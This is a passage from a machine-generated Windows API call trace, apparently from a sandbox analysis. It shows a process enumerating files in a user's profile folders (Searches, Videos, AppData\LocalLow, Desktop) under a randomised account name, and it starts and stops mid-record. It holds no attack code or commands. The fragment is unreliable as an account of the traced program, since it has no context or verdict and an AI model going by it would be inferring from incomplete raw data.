ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.761] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0227.761] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7148 | out: hHeap=0x630000) returned 1 [0227.761] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.761] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0227.761] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.761] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.761] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.762] PathFindFileNameW (pszPath="") returned="" [0227.762] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7148 | out: hHeap=0x630000) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0227.762] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.762] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.762] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0227.762] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.762] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.762] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.762] PathFindFileNameW (pszPath="") returned="" [0227.762] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0227.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.763] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.763] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0227.763] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.763] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.763] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.763] PathFindFileNameW (pszPath="") returned="" [0227.763] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0227.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7218 | out: hHeap=0x630000) returned 1 [0227.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7148 | out: hHeap=0x630000) returned 1 [0227.763] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.763] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0227.763] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.763] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.764] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.764] PathFindFileNameW (pszPath="") returned="" [0227.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0227.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7218 | out: hHeap=0x630000) returned 1 [0227.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7148 | out: hHeap=0x630000) returned 1 [0227.764] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.764] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0227.764] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.764] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.764] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.764] PathFindFileNameW (pszPath="") returned="" [0227.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbf37e40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbf37e40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbf37e40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbf37e40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefb8d340, ftCreationTime.dwHighDateTime=0x1d5d9ab, ftLastAccessTime.dwLowDateTime=0x8fc56a20, ftLastAccessTime.dwHighDateTime=0x1d5dd66, ftLastWriteTime.dwLowDateTime=0x8fc56a20, ftLastWriteTime.dwHighDateTime=0x1d5dd66, nFileSizeHigh=0x0, nFileSizeLow=0x17b4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8RYL8Xv3gwr89piN.flv", cAlternateFileName="8RYL8X~1.FLV")) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37f59a00, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x42b5a5c0, ftLastAccessTime.dwHighDateTime=0x1d5e576, ftLastWriteTime.dwLowDateTime=0x42b5a5c0, ftLastWriteTime.dwHighDateTime=0x1d5e576, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g1CuCps yZIAOwjCa", cAlternateFileName="G1CUCP~1")) returned 1 [0227.765] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88546410, ftCreationTime.dwHighDateTime=0x1d5e146, ftLastAccessTime.dwLowDateTime=0x7f6b8a00, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7f6b8a00, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PCPKs0u", cAlternateFileName="")) returned 1 [0227.765] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88546410, ftCreationTime.dwHighDateTime=0x1d5e146, ftLastAccessTime.dwLowDateTime=0x7f6b8a00, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7f6b8a00, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PCPKs0u", cAlternateFileName="")) returned 0 [0227.765] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c00 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5390 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5180 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b98 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e08 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e70 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6ed8 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b57b0 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6f40 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5860 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6fa8 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b58b8 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7010 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5910 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c68 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b53e8 | out: hHeap=0x630000) returned 1 [0227.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b8 | out: hHeap=0x630000) returned 1 [0227.766] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.766] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0227.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0227.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.766] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.766] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.766] PathFindFileNameW (pszPath="") returned="" [0227.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc20 | out: hHeap=0x630000) returned 1 [0227.766] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.766] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0227.767] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0227.767] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0227.767] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0227.767] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.767] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.767] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\") returned="0wlw97NT\\" [0227.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0227.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.767] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.767] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.767] PathFindFileNameW (pszPath="") returned="" [0227.767] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56ecaea0, ftCreationTime.dwHighDateTime=0x1d5e08d, ftLastAccessTime.dwLowDateTime=0xd544e6c0, ftLastAccessTime.dwHighDateTime=0x1d5e130, ftLastWriteTime.dwLowDateTime=0xd544e6c0, ftLastWriteTime.dwHighDateTime=0x1d5e130, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.769] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56ecaea0, ftCreationTime.dwHighDateTime=0x1d5e08d, ftLastAccessTime.dwLowDateTime=0xd544e6c0, ftLastAccessTime.dwHighDateTime=0x1d5e130, ftLastWriteTime.dwLowDateTime=0xd544e6c0, ftLastWriteTime.dwHighDateTime=0x1d5e130, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.769] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe8870, ftCreationTime.dwHighDateTime=0x1d5d8f9, ftLastAccessTime.dwLowDateTime=0x609e9970, ftLastAccessTime.dwHighDateTime=0x1d5d7ca, ftLastWriteTime.dwLowDateTime=0x609e9970, ftLastWriteTime.dwHighDateTime=0x1d5d7ca, nFileSizeHigh=0x0, 